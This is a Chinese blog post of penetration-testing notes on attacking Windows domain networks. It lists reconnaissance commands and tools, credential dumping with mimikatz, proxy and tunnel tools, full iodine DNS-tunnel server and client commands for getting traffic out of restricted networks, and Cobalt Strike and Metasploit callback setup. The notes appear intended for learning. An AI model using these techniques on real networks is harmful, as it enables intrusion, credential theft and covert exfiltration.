内网前期准备小结

本文介绍了域的设置目的,包括内网安全管理和新员工配置。详细讲述了域信息的收集方法,如使用netview和BloodHound工具,以及利用代理和隧道技术解决内外网通信问题。文章还涵盖了后门上线和通信环境中的DNS隧道策略。
摘要由CSDN通过智能技术生成

域产生原因

简单来说就是为了安全和方便控制域内主机

内外网隔离后,内网安全性大大提升
一个具有一定规模的企业,每天都可能面临员工入职和离职,因此网络管理部门经常需要对域成员主机进行格式化消除磁盘的文件,然后重装系统及软件,以提供给新员工使用;因此,为了便于后期交接,大多网络管理员会做好一个系统镜像盘,统一安装所有的电 脑,并且在安装的时候设置惯用、甚至统一的密码。

域信息收集

net view /domain 查询域列表
net time /domain 从域控查询时间,会返回域控主机名,ping一下获取其ip
net user /domain 查询域用户
ipconfig /all 判断存在域
systeminfo 详细信息
netstat -ano 端口列表
tasklist 进程列表
route print 路由表

工具:Adfind BloodHound fscan 
提权后cs端口扫描135

密码&凭据&口令等

收集各种密文,明文,口令等,为后续横向渗透做好测试准备
计算机用户 明文,HASH获取-mimikatz(win),CS 插件

代理&隧道技术

代理:解决外网内网无法通讯问题
隧道:解决协议不出网,如不支持tcp协议

代理
msf auxiliary/server/socks_proxy,viper
cs 代理转发-Socks 代理

代理软件:Proxifier ProxyChains

隧道
frp隧道 tcp, udp, http, https
icmp pingtunnel
ssh隧道

SMB 隧道
判断:445 端口开放
通讯:直接 SMB 协议通讯即可

DNS 隧道
dns 区域传输 tcp 域名解析 udp
判断:nslookup dig
1、上线环境:内网主机只出网 DNS 协议数据,解决上线
-域名申请及配置
-监听器创建及配置
-后门绑定监听器及生成
2、通讯环境:
内网主机只出网 DNS 协议数据,解决通讯
https://github.com/yarrick/iodine
判断出网:nslookup www.baidu.com
-服务器:设置密码 xiaodi 并创建虚拟 IP 及绑定域名指向
iodined -f -c -P xiaodi 192.168.0.1 ns1.xiaodi8.com -DD
设置密码 xiaodi 并创建虚拟 IP 及绑定域名指向
-客户端:连接密码 xiaodi 并绑定域名指向
iodine -f -M 200 -P xiaodi ns1.xiaodi8.com
-尝试通讯尝试连接:
ssh root@192.168.0.2

后门上线

cs
正向连接 选beacon tcp
反向连接 转发上线
msf
run autoroute -p //查看当前路由表
run post/multi/manage/autoroute //添加当前路由表
内网上线,内网攻击模块要正向连接 set payload

正向连接还是反向连接看防火墙策略
windows防火墙常用命令 - 苍山落暮 - 博客园 (cnblogs.com)

  • 8
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值